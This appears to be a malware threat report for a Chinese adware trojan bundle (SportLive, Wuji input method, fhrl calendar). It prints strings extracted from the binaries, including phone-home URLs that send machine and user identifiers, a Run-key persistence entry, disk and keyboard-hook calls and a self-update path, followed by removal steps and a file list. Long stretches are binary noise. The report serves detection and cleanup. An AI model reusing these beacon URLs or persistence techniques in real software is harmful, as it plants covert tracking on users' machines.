mfcm90.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
user32.dll
ole32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
OLEACC.dll
\Liveconfig.ini
%A,%B,%d,%Y
D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
%s (%s:%d)
images\tab_bg.png
images\tabclose1.png
images\tabclose2.png
images\tabclose3.png
images\tab_item1.png
images\tab_item2.png
images\tab_item3.png
http://sport.yuejan.com/online/html/events/ad.html
http://sport.yuejan.com/online/html/events/event.html
sports.cntv.cn
tv.cntv.cn
apps.sports.cntv.cn
live.video.sina.com.cn/room/
Software\Microsoft\Windows\CurrentVersion\Run
KeyName=%s
\\.\PhysicalDrive%d
X-X-X-X-X-X
%Program Files%\xxss.ini
http://dif.9yfc.com/cloudy/iau.xhtml?op=active&st=1&ma=
CWebPage
F:\project\SprotLive\Release\
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
CreateDialogIndirectParamA
GetKeyState
UnhookWindowsHookEx
SetWindowsHookExA
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
RegCreateKeyExA
RegCloseKey
RegOpenKeyExA
RegOpenKeyA
RegDeleteKeyA
RegEnumKeyA
ADVAPI32.dll
SHELL32.dll
COMCTL32.dll
SHLWAPI.dll
oledlg.dll
OLEAUT32.dll
gdiplus.dll
IPHLPAPI.DLL
GetProcessHeap
.?AVCCmdUI@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCObject@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCOleException@@
.PAVCOleDispatchException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCResourceException@@
.PAVCArchiveException@@
.PAVCFileException@@
zcÁ
.?AVCCmdTarget@@
.PAVCException@@
.?AVCWebPage@@
%Program Files%\xxdd\SportLive.exe
%Program Files%\xxdd\Liveconfig.ini
jJs%C*
9D<.KA
Tev%CP
K p<
%F-yg
^L)%X,
.fQEC)
k.KKS
`t":.rZ"
.UH8&
h%F& t
*.Aqr
%F-
%D-
.XXPmUx
8.Da`
5.lbK
K5.Ac
!,.WD
x.Dzu
.ZO $r
jsF%f
B.bc'
lX%S:Gm
Sò/
R<#D.Lps
ò4 
.hfpv/m
.gAP]y
%CR-<
2R.bz
mQh%x
.LTb`
esQLo
aQt.bp
|5%s'
;.FE~
Ji%fG
.MyS!
%dL
c.UnG
N9.HG*f
&s%U2N
a#^L%C^,$k
oA.tc2&
c.GWC/B
.Tl2P
22=.pA
')KEY$
Sj Þ^J
q%XMs
H.fb:
S%S6E
v:yu%f
.UrZk
xQi@%X
.DlDR
Z6.af}7E
i]}sGtCp
%C'E}
n".HbU
N9Y%D
EOO  .lj
1.ndY
.trQQ
2\AýD
-%%u(
rM.en
,V.DfB
",Í
g.Ov[*g
P%UX:u
s.tqe
eR.iQ
Mq.FlO4
.fL$V
J.Tj@
.dT}<
1Et ß
%s%:k
mP.pO
LT&4X.LQ<
.ewFy
w.VUO
!l
x`%C$
wV5_U%u
r7.kJ
5.zOE=
.K.Uq
Y.fl|
Af.hd=
p%XD@
.nfqi
/k.qa
S%d#/
 'Q%s
Pw.QC
[ya3K%u
^L%9X-,
%Do,}
v/%x s
%&%.xN
9!%u _)
%sOeK#
L.hDX
(%.Lj
%d,$k
SQ%S"{3
-.Qg=
@.iT'P
x .Xs
}U-j} 
2&2tF%FS
MCRT
^J}%f,<
gA[a%x@
.bwrxR
1V.Tz
YK%UL
)h.OY
.vJcw
o.BJ2
E;.SMS
%C\,<
@I*ËBM
R..xu
ÞlE>
%fl k
m.Vbu
,(%u0
.Tk>X
.doBn
Bv%%f
%f,,k
*.Qg9bif
.TT=U
tB.pl
D=.ST
È '[
dy%XY
.TKyq
AE.wL
f0'.Pe
%UtD%
LG7%u
%1U8*>
JG$.Ir
^KI%dL
_.zY^
#e#b.ig
.DQ:DI
@xdH
C7%c:#
^K%CV,
~.GlkXAV
lSqL
GM.fG^`
C3.tH
N#KEy
sL%SY:3'
u:\^q
~.Lz/;"%
U%d.PVS
8.axb
1[s%D
`#?eXe
cúo
%XH\XzT"
.pQF(
LI%X-@
d.KM/
.gdGT1
Qx.KP
%f,}vh
uuBTcpaB
\R%DhG
jSLJJik.BCV
luRl
V(]E.ie
7!.va
X|I.Xiky
)Y.iu
LMSg
Eq0%X
$scm%X
%F Q21Sm
30}L2
K-a}BD;
zH.lG
!H8UX%s
4]j%7Uu
Wj.bL
.xzev
Xiy%x
%dL$k
O$Ç
v> .bt
wdGwG%s
%8x."@
.aK>5
^JÏL
:Vk.Tl
a.EDY
.gQ&c
Kg.MFQZ
r.aK;
4.qrq
7333332
OU)>M
.uUUs
.UVVg
aKi.Xa
Q )Odc.eff
ee%.s)
f.mAYU
d.UVK
c%cRU[
%x< *
h:\J[
)%fl$K
Ay.KV
%Xa(_
b/(%XD
1.Tb2
.Ds3E<
.jL`Oz_
E.EGF
^KuMsG
.MF;e
%dL4k
m%fL4K
%9S.<
9 .ud
#.bIA
QJ%4s
0~.Au
W/%Ut
!=%DG
)(@:::5%
CRP%x
{IjP.tk%
%Ck\3R
%fl4K
H6).nO
.VD8VEmg K
Q=f\LA%f
iXZ.td EJ
Ppr-5P}
#Ha%CQf
I-f}3
f#|
QV.bp
%URiz
.EEr8
q.iQf
C.SJw 
.qsn8q
.BS=uV
.dL9)
I%dl4
9%fU/
_J@%D
".DZ(
ZH.GP
Nzl%uu
.qHF^
|I.qh
,b50z3.Bq
.CWU!
.DfTb]
.it-&D? 
q&.id
Mj.gv
^k.uH$
\Ku%d
%x-@D
?5.MS
.hU&W
/.xVy
Ë d
.qQGFG
b'Ä
.UHf5 1
Wk"@.Xg
{>.sN
(.Bpr
%dL@k
.Ptj?
G%xu)F
url\{X
`2.TEHR
?Bx%F
%u$qP
4U5.Wm
1M.dWa
wA.IL
;P"F%C
.Ul56
f.ZqB
.du)@
Vm.dv:Q
nf.MI
oOuk)s{%U[
.rXW(
:%2x\D
z%djt
)).RwS
-z}s-]
%xQ#Y
(t %fN
%c-V,
#%CX\
q"Y.uPbXk
}.YRr
J(B/.Tv
5%dur
.bsf`?
)%d,<
Rb.ht
Q.AV#
"zO%f
A"p
.osWF
?.yy@
W%cpA
c.Yvhr
.bfAAN?
^Jq%d
\:%x"
Vj/n%fg
&]D'%fp
;'k%d~
iho.TH
|d.EH
w.gNY
.bl0Z
RP%D`
.VyKe
C.bbL$
qF%D$
R7X`%c
h=.QT
V(j{%S
&@M
eWEb
a.Lt>
:4.MIcX
y.lT\n
%E.oI
D1%Dr
;Mn%F
}F%5S\
-Bi}M9
P].yv
~.rl^
VLn;P.au
.IoK(
7uu
Q:\2y
@.cSx8H\
6qN%U
46.wjJ
iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
.Twyy
" id="W5M0MpCehiHzreSzNTczkc9d"?>        Thz5
diTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
" id="W5M0MpCehiHzreSzNTczkc9d"?>        =
" id="W5M0MpCehiHzreSzNTczkc9d"?>        8
.hH'"
'.dDji
" id="W5M0MpCehiHzreSzNTczkc9d"?>        3^
/%$]]](((
>-i7%DRG$
F1kL%U
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
gdi32.dll
winspool.drv
advapi32.dll
shlwapi.dll
oleaut32.dll
iphlpapi.dll
accKeyboardShortcut
ekernel32.dll
mscoree.dll
KERNEL32.DLL
6.0.1
{8856F961-340A-11D0-A96B-00C04FD705A2}
(*.*)
1.0.1
SprotLive.exe

Wuji.exe_568:




.text
`.data
.rsrc
MSVBVM60.DLL
.Play78QQForm
.Play78QQButton
SHDocVwCtl.WebBrowser
#vb6chs.dll
shdocvw.dll
WebBrowser
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
H:\WINDOWS\system32\shdocvw.oca
GetAsyncKeyState
shell32.dll
ShellExecuteA
DeleteUrlCacheEntryA
user32.dll
Wuji.ime
advapi32.dll
RegCreateKeyA
RegCloseKey
GetProcessHeap
kernel32.dll
H:\WINDOWS\system32\MSVBVM60.DLL\3
COMDLG32.DLL
FH:\WINDOWS\system32\stdole2.tlb
VBA6.DLL
Keys
.kJC_a\
I|.....4444445555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555.zI
Ey   ....11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111.......yE
All (*.*)| *.*
New_Key
http:///
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
http://www.miaoxia123.com
\Wuji.dat
Wuji.dat
\Show.dat
Show.dat
http://www.mi
a123.net/
gmts:\\.\ro
st.ex
install.php?login=
Email:[email protected] http://www.miaoxia123.com
*.TXT
|*.txt
onlinefirst.php?user=
\update.exe
WindowState
.commonDialog
.VBError
Windows 95 OSR2
Windows 95
Windows 98 SE
Windows 98
Windows ME
Windows 2000 Data center
Windows 2000 Advanced
Windows 2000
Windows Vista
Windows XP Professional
Windows XP Home
Windows XP
Windows Server 2003 Enterprise
Windows Server 2003 Data center
Windows Server 2003 Web Edition
Windows Server 2003 Standard
Windows Server 2003
Web Server Edition
Windows Vista Server 2008
Windows 7
6.2.9200
Windows 8
Windows 8.1
5.0.2195
Windows 2000
Windows
5.2.3790
Windows Other
000000000000
http://
online.php?user=


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Wuji.exe:568
    FhCalendar.exe:452
    wujiime.exe:464
    MSIB.tmp:916
    xxdd_165.exe:452
    updroots.exe:1016
    114gglm_016.exe:488
    Update.exe:444
    fhrl_6_12001.exe:320
    fhsli_6_12001.exe:1852
    netsh.exe:436
    netsh.exe:628
    SportLive.exe:908
    MsiExec.exe:1760
    oemfhsli.exe:628

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\fixad[1].htm (1737 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetHoliday[1].ashx (876 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\SendClickData[1].ashx (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\picchange[1].css (584 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\sogou_icon_short[1].png (1421 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (977 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\qi[1].htm (162 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\picchange[1].js (908 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[1].js (376 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\82ea18df-b4ae-4b17-b1ab-46cba4b98343[1].jpg (19946 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\CAH4OJPH.htm (2844 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (1403 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (330 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\pixel[1].htm (6 bytes)
    %Program Files%\fhrl\note.ini (991 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\CAQJWRVK.htm (1684 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\924aed3e-a026-4cc3-996e-72927d75dda5[1].jpg (7278 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\jquery-1.3.2.min[1].js (36827 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\qi[1].htm (162 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetWeather[1].ashx (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[2].js (421 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\qi[2].htm (162 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\CAKPO1SZ.htm (3738 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (1952 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\48aaf3d6-f95f-4921-8a68-2606aed69a12[1].jpg (13306 bytes)
    %Program Files%\Wuji\Wuji.exe (7209 bytes)
    %Program Files%\Wuji\update.exe (7451 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\无极输入法.lnk (638 bytes)
    %Program Files%\Wuji\Wuji.dat (1945 bytes)
    %Program Files%\Wuji\uninst.exe (3685 bytes)
    %Documents and Settings%\%current user%\Desktop\无极输入法.lnk (626 bytes)
    %Program Files%\Wuji\Wuji.dll (2422 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\卸载无极输入法.lnk (479 bytes)
    %System%\catsrvuz.dll (53 bytes)
    %Program Files%\Wuji\Show.dat (5 bytes)
    %Program Files%\xxdd\Liveconfig.ini (22 bytes)
    %Program Files%\xxdd\xxdd.msi (146581 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wujiime.exe (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\version[1].txt (72 bytes)
    %Program Files%\fhrl\Update.log (402 bytes)
    %Program Files%\fhrl\fhUp\Update\version.ini (72 bytes)
    %Program Files%\fhrl\Skin\test\btn_push.png (263 bytes)
    %Program Files%\fhrl\Skin\test\clock_bk.png (2 bytes)
    %Program Files%\fhrl\Skin\test\²Ëµ¥bk.png (1 bytes)
    %Program Files%\fhrl\Skin\test\È·ÈÏ°´Å¥2̬.png (1 bytes)
    %Program Files%\fhrl\Skin\test\ÀͶ¯½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\closetip_hov.png (4 bytes)
    %Program Files%\fhrl\Skin\test\xpopweb.xml (2 bytes)
    %Program Files%\fhrl\Skin\test\jsq_del_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\xhlwnd.xml (2 bytes)
    %Program Files%\fhrl\Skin\test\¹úÇì½Ú.png (508 bytes)
    %Program Files%\fhrl\Skin\test\equal_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\city_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\button_hover.png (792 bytes)
    %Program Files%\fhrl\Skin\test\finish_push.png (417 bytes)
    %Program Files%\fhrl\Skin\test\mini_bk.png (14 bytes)
    %Program Files%\fhrl\Skin\test\go_hov.png (2 bytes)
    %Program Files%\fhrl\Fhuninstall.exe (9178 bytes)
    %Program Files%\fhrl\Skin\test\½Ìʦ½Ú.png (545 bytes)
    %Program Files%\fhrl\Skin\test\ca_push.png (2 bytes)
    %Program Files%\fhrl\Skin\test\ÆßϦ½Ú.png (930 bytes)
    %Program Files%\fhrl\Skin\test\go_nor.png (2 bytes)
    %Program Files%\fhrl\FMTest.exe (14713 bytes)
    %Program Files%\fhrl\huangli.xml (6456 bytes)
    %Program Files%\fhrl\Skin\test\finish_hov.png (413 bytes)
    %Program Files%\fhrl\Skin\test\shop_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\test\closetip_push.png (4 bytes)
    %Program Files%\fhrl\Skin\test\input.png (3 bytes)
    %Program Files%\fhrl\Skin\test\back_push.png (2 bytes)
    %Program Files%\fhrl\Update.exe (17508 bytes)
    %Program Files%\fhrl\Skin\test\btn_mini_down.png (279 bytes)
    %Program Files%\fhrl\KillProc.exe (4255 bytes)
    %Program Files%\fhrl\Skin\test\calendar.png (7 bytes)
    %Program Files%\fhrl\Skin\test\day_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_btn_uninstall.png (1392 bytes)
    %Program Files%\fhrl\Skin\test\setting_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\clocknote_list_item.xml (3 bytes)
    %Program Files%\fhrl\Skin\test\¼Ù.png (1 bytes)
    %Program Files%\fhrl\Skin\test\edit_nor.png (431 bytes)
    %Program Files%\fhrl\Skin\test\button_B_hover.png (613 bytes)
    %Program Files%\fhrl\Skin\test\clock_nor.png (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\·çºÍÈÕÀú\·çºÍÈÕÀú.lnk (686 bytes)
    %Program Files%\fhrl\uninst.exe (738 bytes)
    %Program Files%\fhrl\Skin\test\ÖÐÇï½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\shop_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\Combo_over.bmp (3 bytes)
    %Program Files%\fhrl\Skin\test\xfhnotetip.xml (1 bytes)
    %Program Files%\fhrl\FMDLL32.dll (14324 bytes)
    %Program Files%\fhrl\Skin\test\look_push.png (2 bytes)
    %Program Files%\fhrl\Skin\test\menu.xml (1 bytes)
    %Program Files%\fhrl\Skin\test\jsq_process.png (3 bytes)
    %Program Files%\fhrl\Skin\test\jia_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\Refresh_hover.png (1 bytes)
    %Program Files%\fhrl\Skin\test\clock_sel.png (2 bytes)
    %Program Files%\fhrl\Skin\test\tip_bk.png (2 bytes)
    %Program Files%\fhrl\Skin\test\equal_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\³ýϦ.png (1 bytes)
    %Program Files%\fhrl\Skin\test\setting_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_btn_back.png (1 bytes)
    %Program Files%\fhrl\Skin\warn.wav (314 bytes)
    %Program Files%\fhrl\subdivis.db (4 bytes)
    %Program Files%\fhrl\Skin\test\shop_sel.png (2 bytes)
    %Program Files%\fhrl\Skin\test\jsq_show.png (3 bytes)
    %Program Files%\fhrl\Update\version.ini (72 bytes)
    %Program Files%\fhrl\Skin\test\btn_mini_normal.png (1578 bytes)
    %Program Files%\fhrl\Skin\test\xminiweb.xml (2 bytes)
    %Program Files%\fhrl\Skin\test\js_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\clock_del_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\look_nor.png (2 bytes)
    %Program Files%\fhrl\Skin\test\jsq_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\index_1.png (2 bytes)
    %Program Files%\fhrl\Skin\Default\foembin.exe (12158 bytes)
    %Program Files%\fhrl\Skin\test\button_normal.png (676 bytes)
    %Program Files%\fhrl\Skin\test\xiala_1.png (1 bytes)
    %Program Files%\fhrl\Skin\test\Ôªµ©.png (2 bytes)
    %Program Files%\fhrl\Skin\test\btn_hot.png (1228 bytes)
    %Program Files%\fhrl\FhCalendar.exe (19232 bytes)
    %Program Files%\fhrl\Skin\Default\Skin.ini (1 bytes)
    %Program Files%\fhrl\Skin\test\Ê¥µ®½Ú.png (873 bytes)
    %Program Files%\fhrl\Skin\test\js_sel.png (1 bytes)
    %Program Files%\fhrl\Skin\test\index.png (2 bytes)
    %Program Files%\fhrl\Skin\test\btn_close_highlight.png (475 bytes)
    %Program Files%\fhrl\Skin\test\ca_nor.png (2 bytes)
    %Program Files%\fhrl\Skin\Default\unist_btn_next.png (1350 bytes)
    %Program Files%\fhrl\Skin\test\¸Ð¶÷½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\¹í½Ú.png (913 bytes)
    %Program Files%\fhrl\Skin\test\¼ÙÑ¡ÖÐ.PNG (3 bytes)
    %Program Files%\fhrl\Skin\test\xbasicsetting.xml (4 bytes)
    %Program Files%\fhrl\Skin\test\tip.png (1 bytes)
    %Program Files%\fhrl\Skin\test\jsq_del_hov.png (1 bytes)
    %Program Files%\fhrl\FMDLL.dll (14673 bytes)
    %Program Files%\fhrl\Skin\test\close_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\xiala_3.png (1 bytes)
    %Program Files%\fhrl\DuiLib_u.dll (10572 bytes)
    %Program Files%\fhrl\Skin\test\day_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\xfh.xml (1568 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\·çºÍÈÕÀú.lnk (692 bytes)
    %Program Files%\fhrl\Skin\test\scrollbar.bmp (1568 bytes)
    %Program Files%\fhrl\Skin\test\´º½Ú.png (1 bytes)
    %Documents and Settings%\All Users\Desktop\·çºÍÈÕÀú.lnk (674 bytes)
    %Program Files%\fhrl\Skin\test\dian.png (290 bytes)
    %Program Files%\fhrl\Skin\test\clock_del_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\back_nor.png (2 bytes)
    %Program Files%\fhrl\Skin\test\S_22.png (1 bytes)
    %Program Files%\fhrl\Skin\test\ÖØÑô½Ú.png (2 bytes)
    %Program Files%\fhrl\Skin\Default\Controls.ini (285 bytes)
    %Program Files%\fhrl\Skin\Default\bin.ini (1 bytes)
    %Program Files%\fhrl\Skin\test\¶ËÎç½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\delapp1.png (1 bytes)
    %Program Files%\fhrl\Skin\test\close_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\del_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\new_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\logo.png (4 bytes)
    %Program Files%\fhrl\Skin\test\Festival.xml (1 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_pic_top.png (1568 bytes)
    %Program Files%\fhrl\Skin\test\back_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\test\ÇåÃ÷½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\js_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\equal_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\¸¾Å®½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\¸¸Ç×½Ú.png (846 bytes)
    %Program Files%\fhrl\Skin\test\edit_push.png (432 bytes)
    %Program Files%\fhrl\Skin\test\¶ùͯ½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\button_down.png (784 bytes)
    %Program Files%\fhrl\Skin\test\delapp.png (3 bytes)
    %Program Files%\fhrl\Skin\test\clock_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\test\btn_close_normal.png (1682 bytes)
    %Program Files%\fhrl\Skin\test\ÓÞÈ˽Ú.png (991 bytes)
    %Program Files%\fhrl\Skin\test\go_push.png (2 bytes)
    %Program Files%\fhrl\Skin\test\lunar.png (2 bytes)
    %Program Files%\fhrl\Skin\test\°àÑ¡ÖÐ.PNG (3 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Startup\·çºÍÈÕÀú.lnk (686 bytes)
    %Program Files%\fhrl\Skin\test\new_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\day_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\js_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\test\logo_16icon.png (3 bytes)
    %Program Files%\fhrl\Skin\test\bg10.png (1568 bytes)
    %Program Files%\fhrl\Skin\test\ĬÈÏ.png (1 bytes)
    %Program Files%\fhrl\Skin\test\tip_content_bk.png (3 bytes)
    %Program Files%\fhrl\Skin\Default\line.png (2 bytes)
    %Program Files%\fhrl\Skin\test\scrollbar.png (1 bytes)
    %Program Files%\fhrl\Skin\test\shop_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\city_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\button_B_pushed.png (605 bytes)
    %Program Files%\fhrl\Skin\test\logo_mini.png (1 bytes)
    %Program Files%\fhrl\Skin\test\app_bk.png (2 bytes)
    %Program Files%\fhrl\Skin\test\menu_bk.png (3 bytes)
    %Program Files%\fhrl\Skin\test\jia_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\ÔªÏü½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\scrollbar_o.png (1975 bytes)
    %Program Files%\fhrl\Skin\test\jsq_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\del_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\ƽ°²Ò¹.png (1 bytes)
    %Program Files%\fhrl\Skin\test\finish_nor.png (425 bytes)
    %Program Files%\fhrl\Skin\test\ca_sel.png (2 bytes)
    %Program Files%\fhrl\Skin\test\jsq_res.png (3 bytes)
    %Program Files%\fhrl\Skin\test\ĬÈÏÑ¡ÖÐ.png (2 bytes)
    %Program Files%\fhrl\Skin\test\jintian3.png (3 bytes)
    %Program Files%\fhrl\Skin\test\layerClo.png (1 bytes)
    %Program Files%\fhrl\Skin\Default\btn_radio.png (1 bytes)
    %Program Files%\fhrl\Skin\test\È·ÈÏ°´Å¥³£Ì¬.png (1 bytes)
    %Program Files%\fhrl\Skin\test\button_B_normal.png (474 bytes)
    %Program Files%\fhrl\Skin\test\setting_push.png (1 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\·çºÍÈÕÀú\жÔØ·çºÍÈÕÀú.lnk (691 bytes)
    %Program Files%\fhrl\Skin\test\clock_del_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\chat_mid_bk.png (1308 bytes)
    %Program Files%\fhrl\Skin\test\closetip_nor.png (4 bytes)
    %Program Files%\fhrl\Skin\test\clock_note_setting.xml (8 bytes)
    %Program Files%\fhrl\Skin\test\Refresh_pushed.png (1 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_btn_cancel.png (890 bytes)
    %Program Files%\fhrl\Skin\test\ĸÇ×½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\S_11.png (1 bytes)
    %Program Files%\fhrl\Skin\test\look_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_btn_close.png (2 bytes)
    %Program Files%\fhrl\Skin\test\bord_bk.png (3 bytes)
    %Program Files%\fhrl\Skin\test\Combo_nor.bmp (3 bytes)
    %Program Files%\fhrl\Skin\test\btn_mini_highlight.png (1440 bytes)
    %Program Files%\fhrl\Skin\test\btn_close_down.png (1098 bytes)
    %Program Files%\fhrl\Skin\test\°à.png (1 bytes)
    %Program Files%\fhrl\Skin\test\jsq_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\close_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\ÇéÈ˽Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_btn_check.png (3 bytes)
    %Program Files%\fhrl\Skin\test\edit_hov.png (429 bytes)
    %Program Files%\fhrl\Skin\test\clock_push.png (2 bytes)
    %Program Files%\fhrl\Skin\test\¹â¹÷½Ú.png (536 bytes)
    %Program Files%\fhrl\Skin\test\Refresh_normal.png (1 bytes)
    %Program Files%\fhrl\Skin\test\jsq_del_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\xiala_2.png (1 bytes)
    %Program Files%\fhrl\Skin\test\del_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\jia_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\ca_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\test\new_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\weather_bk.png (15 bytes)
    %Program Files%\fhrl\Skin\test\friend_list_item.xml (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\System.dll (10 bytes)
    %Program Files%\Common Files\Install\fhrlsli\info.ini (996 bytes)
    %Program Files%\Common Files\Install\fhrlsli\oemfhsli.exe (17882 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\lb[1].png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\iau[1].htm (1 bytes)
    %Program Files%\xxss.ini (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\core[1].php (800 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\z_stat[1].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\ad_sport[1].jpg (12251 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (163 bytes)
